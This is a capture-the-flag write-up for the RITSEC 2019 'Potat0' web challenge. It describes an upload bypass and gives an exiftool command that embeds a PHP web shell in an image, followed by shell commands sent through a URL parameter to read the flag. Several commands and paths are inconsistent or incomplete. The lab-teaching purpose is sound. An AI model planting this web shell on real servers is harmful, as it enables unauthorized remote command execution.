RITSEC CTF 2019 Writeups- Potat0(web-RCE) - 158 points

 

Challenge: Potat0 - web RCE

Scope: http://ctfchallenges.ritsec.club:8003/

Solution:

1. I went to the URL: http://ctfchallenges.ritsec.club:8003/
2. viewed the source page and got a hint stating:<!-- upload and photos not yet linked -->which means we can upload a file.
3. so I checked if there was a folder where we can upload using dirb http://ctfchallenges.ritsec.club:8003/uploads and found the upload folder was writable which made me think it must be an RCE vuln.
4. so I checked the link as follows: http://ctfchallenges.ritsec.club:8003/uploads
5. It means there should be an upload page so checked the link as it was giving an error message of apache server not finding until I found the right path knew it was a PHP site. and got the path as follow:http://ctfchallenges.ritsec.club:8003/uploads
6.  I went to the upload page using the following URL:http://ctfchallenges.ritsec.club:8003/upload.php and tried to upload the text file it returned an error so we could not upload text file.
7. I tried uploading both png and jpeg files which gave me an error as well, I again checked the source file where I noticed the image which was rendering in the link page had both height and width of 30px so created an image of size 60px both side and uploaded. it was successful and I could see the image in http://ctfchallenges.ritsec.club:8003/uploads  folder so quite obvious for RCE.
8.  Now as we could upload, I embeded php webshell  in a image file as follows with exiftool : exiftool -Comment='<?php if(isset($_REQUEST['cmd'])){echo '<pre>';$cmd = ($_REQUEST['cmd']);system($cmd);echo '</pre>';} __halt_compiler();?>' image-name.png
9. Renamed the image name to .php.png as follows: 'mv image-name.php.png'  and save it.
10. I uploaded the image and access the uploads directory from URL:http://ctfchallenges.ritsec.club:8003/uploads
11. As I accessed the uploads directory and clicked the image that I uploaded to run the PHP  web shell that I embedded in the image file. Just to check if it's working I typed the following command in the URL: http://ctfchallenges.ritsec.club:8003/upload?cmd = ls which gave me the directory list which consists of two files:1.10_0_0_37.php.png the file that we uploaded and a file named test that was already there. So now i knew it was working.
12. Again I ran some more commands like 1)http://ctfchallenges.ritsec.club:8003/upload/cmd=pwd which gave me the path of present working directory:/var/www/html/uploads 2)http://ctfchallenges.ritsec.club:8003/upload/cmd=cd ..;ls which listed me all the files one directory up.
13. Then I started moving through the webserver directories with the following commands in the URL:  http://ctfchallenges.ritsec.club:8003/upload?cd /; ls and got all the directories in the root folder. 
14.  I checked all the folders one by one and found the flag.txt which was inside /home directory, So I checked the content of the file with the following command and got the flag:http://ctfchallenges.ritsec.club:8003/upload?cmd=cd /;cd home;cat falg.txt

          flag:RS_CTF{FILE_UPLOAD_ISN'T_SECURE}

Note: As I am a newbie in this field please correct me if I did or said something wrong in the writeup.

Your comments are much appreciated.